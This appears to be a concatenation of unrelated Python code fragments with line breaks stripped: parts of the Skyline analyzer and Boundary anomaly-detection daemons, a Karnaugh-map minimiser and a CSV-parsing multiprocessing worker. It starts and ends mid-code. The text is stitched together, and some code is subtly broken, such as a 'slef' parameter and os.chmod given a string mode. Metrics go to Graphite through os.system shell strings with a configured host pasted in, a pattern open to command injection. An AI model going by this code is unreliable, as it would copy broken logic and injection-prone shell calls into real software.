sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Send alerts #if settings.ENABLE_ALERTS: # for alert in settings.ALERTS: # for metric in self.anomalous_metrics: # if alert[0] in metric[1]: # try: # last_alert = self.redis_conn.get('last_alert.' + metric[1]) # if not last_alert: # self.redis_conn.setex('last_alert.' + metric[1], alert[2], packb(metric[0])) # self.send_mail(alert, metric) # except Exception as e: # logger.error("couldn't send alert: %s" % e) # Write anomalous_metrics to static webapp directory filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # process anomalous metrics for metric in self.anomalous_metrics: try: last_save_key = 'last_save.%s.%s' % (metric[1], metric[2]) last_save = self.redis_conn.get(last_save_key) if not last_save: self.redis_conn.setex(last_save_key, settings.SKIP_FREQUENCY, packb(metric[0])) self.storage.save(metric) if settings.ENABLE_ALERTS: last_alert_key = 'last_alert.' + metric[1] last_alert = self.redis_conn.get(last_alert_key) if not last_alert: self.redis_conn.setex(last_alert_key, settings.SKIP_FREQUENCY, packb(metric[0])) self.alerter.add(metric) except Exception as e: logger.error("Failed processing anomaly, pid: %s, metric: %s, error: %s", getpid(), metric[1], e) # send ready alerts if settings.ENABLE_ALERTS: try: self.alerter.send_alerts() except Exception as e: logger.error("Failed sending alerts, error: %s", e) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(self.exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % self.exceptions) logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown) # Log to Graphite if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host)) system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(self.exceptions.values())), now, host)) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host)) system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host)) # Reset counters self.anomalous_metrics[:] = [] self.exceptions = Manager().dict() self.anomaly_breakdown = Manager().dict() # Sleep if it went too fast if time() - now < 5: logger.info('sleeping due to low run time...') sleep(10)
class KarnaughMap(object): def __init__(self, n, MaxProcess=16384): #self.blocks = Manager().list() self.blocks = [] self.kmap = {} self.kmapDCare = {} self.kmapValues = {} self.MaxProcess = MaxProcess print "MaxProcess %d" % MaxProcess self.completion = 0 # Set number of variables self.numberOfVariables=n self.numberOfDCares=0 # Determine width and height from n. of vars self.width=int(pow(2, ceil(n/2.0))) self.height=int(pow(2, floor(n/2.0))) # Fill map with 0s and clear the list of KarnaughNodes self.Reset() # Fill map kmapValues with values that each cell in the map # has. Look here for rules: # http:#www.allaboutcircuits.com/vol_4/chpt_8/3.html if(self.numberOfVariables>2): for i in range(0,self.height): for j in range(0,self.width): if(i%2 ==0 ): self.kmapValues[(j, i)]=self.GrayEncode(j+((i)*self.width)) else: self.kmapValues[(j, i)]=self.GrayEncode(self.width-1-j+((i)*self.width)) else: if(self.numberOfVariables==2): self.kmapValues[(0, 0)]=0 self.kmapValues[(1, 0)]=1 self.kmapValues[(0, 1)]=2 self.kmapValues[(1, 1)]=3 if(self.numberOfVariables==1): self.kmapValues[(0, 0)]=0 self.kmapValues[(1, 0)]=1 def Reset(self): """ Fills map with zeros and deletes all nodes from the solution list """ for i in range(0,self.height): for j in range(0,self.width): self.Set(j, i, 0 ) self.blocks=Manager().list() def Solve(self, completion): """ Iterates through all possible ways that 'Don't cares' can be arranged, and finds one with fewest number of nodes in the solution (bestc). If there are more ways that give the same number of nodes in the solution choose the one with biggest nodes (bestsc) """ best = [] bestc=-1 bestsc=0 #for i in range(0, int(pow(2.0, self.numberOfDCares )) ): for i in range(0, 1 ): b = [] j=i while(j>0): b.insert(0, (j%2) ) j=j/2 for j in range(len(b), self.numberOfDCares): b.insert(0, 0 ) #self.blocks= Manager().list() self.blocks= [] c=0 for k in range(0, self.height): for l in range(0, self.width): if(self.kmapDCare[(l, k)]==1): self.kmap[(l, k)]=1 #if(b[c]==1): # self.kmap[(l, k)]=1 #else: # self.kmap[(l, k)]=0; c += 1 self.Solve2( completion ) if( (bestc==-1) | (len(self.blocks)<=bestc) ): sc=0 for iter in self.blocks: for k in range(0,len(iter.values) ): if(iter.values[k]==2): sc += 1 if( (bestc==-1) | (len(self.blocks)<bestc) ): best=self.blocks bestc=len(best) bestsc=sc else: if( sc>bestsc ): best=self.blocks bestc=len(best) bestsc=sc self.blocks=best def Solve2(self, completion): def Join(a,i): CompBlocks = [block for block in blocks if self.IsJoinable(a.values, block.values )] for b in CompBlocks: x=self.IsJoinable(a.values, b.values ) if(x>0): #/* If they can be joined make a new block with 2 in the place #of the one bit where they a and b are different */ n = KarnaughNode() n.numberOfItems=a.numberOfItems*2 n.flag = False for j in range(0, len(a.values) ): if(j!=(x-1)): n.values.append(a.values[j] ) else: n.values.append( 2 ) #/* Mark that a node is part of a larger node */ a.flag=True b.flag=True #/* Check if that block already exists in the list */ exist=False for c in self.blocks: if(n.values==c.values): exist=True if(not exist): self.blocks.append(n ) def CleanProcess(): for process in ProcessList: process.join() for process in ProcessList: jn = resultQueue.get() for n in jn.newblocks: exist = False for c in self.blocks: if(n.values==c.values): exist=True if(not exist): self.blocks.append(n ) for b in jn.removeblocks: for c in self.blocks: if(b.values==c.values): self.blocks.remove(c) """ Check for special case that all cells in the map are the same """ a=1 for i in range(0,self.height): if(a==0): break for j in range(0,self.width): if( self.kmap[(j, i)]!=self.kmap[(0, 0)] ): a=0 break if(a==1): #/* Clear the list so that all those nodes with one item are deleted */ #self.blocks=Manager().list() self.blocks=[] # If there are only zeros in the map there's nothing to solve if (self.kmap[(0, 0)]==0): return else: # If there are only ones, solution is one element as big as the map n=KarnaughNode() n.numberOfItems = self.width*self.height for j in range(0,self.numberOfVariables): n.values.append( 2 ) self.blocks.append(n ) return #/* Put all blocks with 1 element in list */ for i in range(0, self.height): for j in range(0, self.width): if(self.kmap[(j, i)]==1): n=KarnaughNode() n.numberOfItems=1 n.flag=False n.values=self.GetMapBoolValue(j, i ) self.blocks.append(n ) max = int(log(self.width*self.height )/log(2)+1) # Joining blocks into blocks with 2^i elements for sizeloop in range( 1, max ): #/* Check every block with every other block and see if they can be joined #into a bigger block */ blocks = [block for block in self.blocks if (block.numberOfItems == pow(2.0, sizeloop-1)) ] ## resultQueue = Queue() ProcessList = [] for index, a in enumerate(blocks): self.completion = int((1.0*(index+1)/len(blocks)*1.0*1/max+(sizeloop-1.0)/max)*100) completion.value = self.completion Join(a,sizeloop) ## processblocks = list(blocks) ## process = JoinTask(self, processblocks , a, i) ## ProcessList.append(process) ## #process.run() ## process.start() ## while len(ProcessList) >= self.MaxProcess: ## for process in ProcessList: ## process.join(1) ## if not process.is_alive(): ## ProcessList.remove(process) ## while ProcessList: ## for process in ProcessList: ## process.join(10) ## if not process.is_alive(): ## ProcessList.remove(process) ## else: ## print 'wait for process ...' % process.name # Flag block include in other block a_blocks = [block for block in self.blocks if (block.flag==False and block.numberOfItems < pow(2.0, sizeloop)) ] for a_block in a_blocks: b_blocks = [block for block in self.blocks if (block!=a_block and block.numberOfItems > a_block.numberOfItems) ] for b_block in b_blocks: flag_block = True for index in range(len(b_block.values)): if a_block.values[index] != b_block.values[index] and b_block.values[index] != 2: flag_block = False break if flag_block: self.blocks.remove(a_block) break #/* Deletes nodes that are cointained in larger nodes */ blocks = [block for block in self.blocks if (block.flag==True) ] for a in blocks: self.blocks.remove(a) # Delete nodes that are Don't care only ones blocks = self.blocks for block in blocks: DCareblock = True for i in range(0,self.height): for j in range(0,self.width): if(self.IsAtCell(j, i, block.values)): if self.kmapDCare[(j, i)]!=1: DCareblock = False if DCareblock: self.blocks.remove(block) #/* Deletes unneeded nodes. Draws a temp map with all nodes but one #and if that map is same as the main map, node that wasn't drawn can be deleted */ temp = {} blocks = self.blocks for a in blocks: for i in range(0,self.height): for j in range(0,self.width): temp[(j, i)]=0 for b in blocks: if(a!=b): for i in range(0,self.height): for j in range(0,self.width): if(self.IsAtCell(j, i, b.values)): temp[(j, i)]=1 del_var=1 for i in range(0,self.height): for j in range(0,self.width): if(temp[(j, i)]!=self.kmap[(j, i)]) and self.kmapDCare[(j, i)] != 1 : del_var=0 break if(not del_var): break if(del_var): self.blocks.remove(a ) def IsAtCell(self, x, y, a): b=self.GetMapBoolValue(x, y ) for i in range(0, len(a) ): if( (a[i]!=b[i]) & (a[i]!=2) ): return 0 return 1 def GetMapBoolValue(self, x, y): b = [] i=self.GetMapValue(x, y ) while(i>0): b.insert(0, i%2 ) i=i/2 for j in range(len(b), self.numberOfVariables): b.insert(0, 0 ) return b def IsJoinable(self, a, b): """ Checks if 2 karnaugh nodes with values a and b are joinable (only differ in one bit), and if they are returns (place where they differ + 1), otherwise returns 0 """ c=0 for i in range(0,len(a)): if(a[i]!=b[i]): c += 1 x=i if(c==1): return x+1 else: return 0 def GrayEncode(self, g): return int(g) ^ (int(g) >> 1 ) def Set(self, x, y, value): self.kmap[(x, y)]=value if(value==2) : self.kmapDCare[(x, y)]=1 self.numberOfDCares += 1 else: self.kmapDCare[(x, y)]=0 def Get(self, x, y): if(not self.kmapDCare[(x,y)]): return self.kmap[(x,y)] else: return 2 def GetMapValue(self, x, y): return self.kmapValues[(x,y)] def GetWidth(self): return self.width def GetHeight(self): return self.height def GetSolutions(self): return self.blocks def GetNumberOfVars(slef): return self.numberOfVariables
class Worker(object): def __init__(self, fname, output_file): self.fname = fname self.split_files = None ''' self.db_instance = Utility.tinydb_instance() ''' self.undefined_list = Manager().list() self.defined_list = Manager().list() self.lines_to_be = 0 self.output = {} self.opfile = output_file def data_process(self): """ This method is to process the data. It will calculate the line count in file and split file based on line count. Now files are split to the number based on number of cores in machine. returns :Nothing """ logging.info('Processing the data and split files') lines = Utility.file_len(self.fname) self.lines_to_be, self.split_files = Utility.split_files(self.fname, lines, cpu_count().real) def clean_json(self, line_no, row): """ This method is for initial cleaning to reduce overhead from parser. Length of the Each line should be either 4 or 5 comma seperated :param line_no: Line number from the file :param row: the document to process :return: Boolean """ if len(row) not in [4, 5]: return False return True def parse_json(self, fname): """ This is the core function. It will call ParseDoc object and parse each document The output is written to a shared memory list. :param fname: :return: Nothing """ dp = DocProcess(fname, self.lines_to_be) dp.read_csv() parser_doc = ParseDoc() for line_no, row in dp.next(): row_list = row.split(',') if self.clean_json(line_no, row_list): value = parser_doc.parse_machine(row_list) if value: self.defined_list.append(value) else: self.undefined_list.append(line_no) else: self.undefined_list.append(line_no) def mapper(self): workers = [] for s_file in self.split_files: worker_process = Process(target=self.parse_json, args=(s_file, )) workers.append(worker_process) worker_process.start() [worker.join() for worker in workers] def reducer(self): self.output["entries"] = list(self.defined_list) self.output["errors"] = list(self.undefined_list) self.output["errors"].sort() new_list = sorted(self.output["entries"], key=itemgetter('lastname')) self.output["entries"] = new_list with open(self.opfile, 'w') as f: pprint.pprint(self.output, f, indent=2) def run(self): self.mapper() self.reducer()
class Boundary(Thread): def __init__(self, parent_pid): """ Initialize the Boundary """ super(Boundary, self).__init__() self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.boundary_metrics = Manager().list() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def unique_noHash(self, seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True # for dumping the metric timeseries data into for debugging purposes def mkdir_p(self, path): try: os.makedirs(path) return True except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def spin_process(self, i, boundary_metrics): """ Assign a bunch of metrics for a process to analyze. """ # Determine assigned metrics bp = settings.BOUNDARY_PROCESSES bm_range = len(boundary_metrics) keys_per_processor = int(ceil(float(bm_range) / float(bp))) if i == settings.BOUNDARY_PROCESSES: assigned_max = len(boundary_metrics) else: # This is a skyine bug, the original skyline code uses 1 as the # beginning position of the index, python indices begin with 0 # assigned_max = len(boundary_metrics) # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014 # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment assigned_max = min(len(boundary_metrics), i * keys_per_processor) assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys] if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: printing assigned_metrics_and_algos') for assigned_metric_and_algo in assigned_metrics_and_algos: logger.info('debug :: assigned_metric_and_algo - %s' % str(assigned_metric_and_algo)) # Compile assigned metrics assigned_metrics = [] for i in assigned_metrics_and_algos: assigned_metrics.append(i[0]) # unique unhashed things def unique_noHash(seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] unique_assigned_metrics = unique_noHash(assigned_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: unique_assigned_metrics - %s' % str(unique_assigned_metrics)) logger.info('debug :: printing unique_assigned_metrics:') for unique_assigned_metric in unique_assigned_metrics: logger.info('debug :: unique_assigned_metric - %s' % str(unique_assigned_metric)) # Check if this process is unnecessary if len(unique_assigned_metrics) == 0: return # Multi get series try: raw_assigned = self.redis_conn.mget(unique_assigned_metrics) except: logger.error('error :: failed to mget assigned_metrics from redis') return # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Reset boundary_algortims all_boundary_algorithms = [] for metric in BOUNDARY_METRICS: all_boundary_algorithms.append(metric[1]) # The unique algorithms that are being used boundary_algorithms = unique_noHash(all_boundary_algorithms) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: boundary_algorithms - %s' % str(boundary_algorithms)) discover_run_metrics = [] # Distill metrics into a run list for i, metric_name, in enumerate(unique_assigned_metrics): self.check_if_parent_is_alive() try: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(i))) raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) except Exception as e: exceptions['Other'] += 1 logger.error('error :: redis data error: ' + traceback.format_exc()) logger.error('error :: %e' % e) base_name = metric_name.replace(FULL_NAMESPACE, '', 1) # Determine the metrics BOUNDARY_METRICS metric tuple settings for metrick in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metrick[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) metric_pattern_matched = False if pattern_match: metric_pattern_matched = True algo_pattern_matched = False for algo in boundary_algorithms: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1])) metric_expiration_time = False metric_min_average = False metric_min_average_seconds = False metric_trigger = False algorithm = False algo_pattern_matched = True algorithm = metric[1] try: if metric[2]: metric_expiration_time = metric[2] except: metric_expiration_time = False try: if metric[3]: metric_min_average = metric[3] except: metric_min_average = False try: if metric[4]: metric_min_average_seconds = metric[4] except: metric_min_average_seconds = 1200 try: if metric[5]: metric_trigger = metric[5] except: metric_trigger = False try: if metric[6]: alert_threshold = metric[6] except: alert_threshold = False try: if metric[7]: metric_alerters = metric[7] except: metric_alerters = False if metric_pattern_matched and algo_pattern_matched: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm)) discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: printing discover_run_metrics') for discover_run_metric in discover_run_metrics: logger.info('debug :: discover_run_metrics - %s' % str(discover_run_metric)) logger.info('debug :: build unique boundary metrics to analyze') # Determine the unique set of metrics to run run_metrics = unique_noHash(discover_run_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: printing run_metrics') for run_metric in run_metrics: logger.info('debug :: run_metrics - %s' % str(run_metric)) # Distill timeseries strings and submit to run_selected_algorithm for metric_and_algo in run_metrics: self.check_if_parent_is_alive() try: raw_assigned_id = metric_and_algo[0] metric_name = metric_and_algo[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) metric_expiration_time = metric_and_algo[2] metric_min_average = metric_and_algo[3] metric_min_average_seconds = metric_and_algo[4] metric_trigger = metric_and_algo[5] alert_threshold = metric_and_algo[6] metric_alerters = metric_and_algo[7] algorithm = metric_and_algo[8] if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id))) raw_series = raw_assigned[metric_and_algo[0]] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id))) autoaggregate = False autoaggregate_value = 0 # Determine if the namespace is to be aggregated if BOUNDARY_AUTOAGGRERATION: for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS: autoaggregate = False autoaggregate_value = 0 CHECK_MATCH_PATTERN = autoaggregate_metric[0] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: autoaggregate = True autoaggregate_value = autoaggregate_metric[1] if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate))) if ENABLE_BOUNDARY_DEBUG: logger.info( 'debug :: analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % ( metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, autoaggregate, autoaggregate_value, algorithm) ) # Dump the the timeseries data to a file timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm self.mkdir_p(timeseries_dump_dir) timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json" with open(timeseries_dump_file, 'w+') as f: f.write(str(timeseries)) f.close() # Check if a metric has its own unique BOUNDARY_METRICS alert # tuple, this allows us to paint an entire metric namespace with # the same brush AND paint a unique metric or namespace with a # different brush or scapel has_unique_tuple = False run_tupple = False boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters) wildcard_namespace = True for metric_tuple in BOUNDARY_METRICS: if not has_unique_tuple: CHECK_MATCH_PATTERN = metric_tuple[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if metric_tuple[0] == base_name: wildcard_namespace = False if not has_unique_tuple: if boundary_metric_tuple == metric_tuple: has_unique_tuple = True run_tupple = True if ENABLE_BOUNDARY_DEBUG: logger.info('unique_tuple:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) logger.info('metric_tuple: %s' % str(metric_tuple)) if not has_unique_tuple: if wildcard_namespace: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) run_tupple = True else: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace: BUT WOULD NOT RUN') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) if ENABLE_BOUNDARY_DEBUG: logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple) if run_tupple: # Submit the timeseries and settings to run_selected_algorithm anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm( timeseries, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, autoaggregate, autoaggregate_value, algorithm ) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: analysed - %s' % (metric_name)) else: anomalous = False if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: more unique metric tuple not analysed - %s' % (metric_name)) # If it's anomalous, add it to list if anomalous: anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm] self.anomalous_metrics.append(anomalous_metric) # Get the anomaly breakdown - who returned True? triggered_algorithms = [] for index, value in enumerate(ensemble): if value: anomaly_breakdown[algorithm] += 1 triggered_algorithms.append(algorithm) # If Crucible or Panorama are enabled determine details determine_anomaly_details = False if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED: determine_anomaly_details = True if settings.PANORAMA_ENABLED: determine_anomaly_details = True if determine_anomaly_details: metric_timestamp = str(int(timeseries[-1][0])) from_timestamp = str(int(timeseries[1][0])) timeseries_dir = base_name.replace('.', '/') # If Panorama is enabled - create a Panorama check if settings.PANORAMA_ENABLED: # Note: # The values are enclosed is single quoted intentionally # as the imp.load_source used results in a shift in the # decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 added_at = str(int(time())) source = 'graphite' panaroma_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = [\'%s\']\n' \ 'triggered_algorithms = [\'%s\']\n' \ 'app = \'%s\'\n' \ 'source = \'%s\'\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(algorithm), str(algorithm), skyline_app, source, this_host, added_at) # Create an anomaly file with details about the anomaly panaroma_anomaly_file = '%s/%s.%s.txt' % ( settings.PANORAMA_CHECK_PATH, added_at, base_name) try: write_data_to_file( skyline_app, panaroma_anomaly_file, 'w', panaroma_anomaly_data) logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file)) except: logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file)) logger.info(traceback.format_exc()) # If crucible is enabled - save timeseries and create a # crucible check if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED: crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp if not os.path.exists(crucible_anomaly_dir): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(crucible_anomaly_dir, mode_arg) # Note: # Due to only one algorithm triggering here the # algorithm related arrays here are a different format # to there output format in analyzer # Note: # The value is enclosed is single quoted intentionally # as the imp.load_source used in crucible results in a # shift in the decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 crucible_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = %s\n' \ 'triggered_algorithms = %s\n' \ 'anomaly_dir = \'%s\'\n' \ 'graphite_metric = True\n' \ 'run_crucible_tests = False\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(algorithm), triggered_algorithms, crucible_anomaly_dir, skyline_app, metric_timestamp) # Create an anomaly file with details about the anomaly crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name) with open(crucible_anomaly_file, 'w') as fh: fh.write(crucible_anomaly_data) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(crucible_anomaly_file, mode_arg) logger.info('added crucible anomaly file :: %s/%s.txt' % (crucible_anomaly_dir, base_name)) # Create timeseries json file with the timeseries json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name) timeseries_json = str(timeseries).replace('[', '(').replace(']', ')') with open(json_file, 'w') as fh: # timeseries fh.write(timeseries_json) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(json_file, mode_arg) logger.info('added crucible timeseries file :: %s/%s.json' % (crucible_anomaly_dir, base_name)) # Create a crucible check file crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name) with open(crucible_check_file, 'w') as fh: fh.write(crucible_anomaly_data) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(crucible_check_file, mode_arg) logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp)) # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info("exceptions['Other'] traceback follows:") logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) def run(self): """ Called when the process intializes. """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('error :: skyline cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up self.redis_conn.setex(skyline_app, 120, now) # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Reset boundary_metrics boundary_metrics = [] # Build boundary metrics for metric_name in unique_metrics: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: boundary metric - pattern MATCHED - ' + metric[0] + " | " + base_name) boundary_metrics.append([metric_name, metric[1]]) if ENABLE_BOUNDARY_DEBUG: logger.info('debug :: boundary metrics - ' + str(boundary_metrics)) if len(boundary_metrics) == 0: logger.info('no Boundary metrics in redis. try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.BOUNDARY_PROCESSES + 1): if i > len(boundary_metrics): logger.info('WARNING: Skyline Boundary is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, boundary_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.BOUNDARY_ENABLE_ALERTS: for anomalous_metric in self.anomalous_metrics: datapoint = str(anomalous_metric[0]) metric_name = anomalous_metric[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) expiration_time = str(anomalous_metric[2]) metric_trigger = str(anomalous_metric[5]) alert_threshold = int(anomalous_metric[6]) metric_alerters = anomalous_metric[7] algorithm = anomalous_metric[8] if ENABLE_BOUNDARY_DEBUG: logger.info("debug :: anomalous_metric - " + 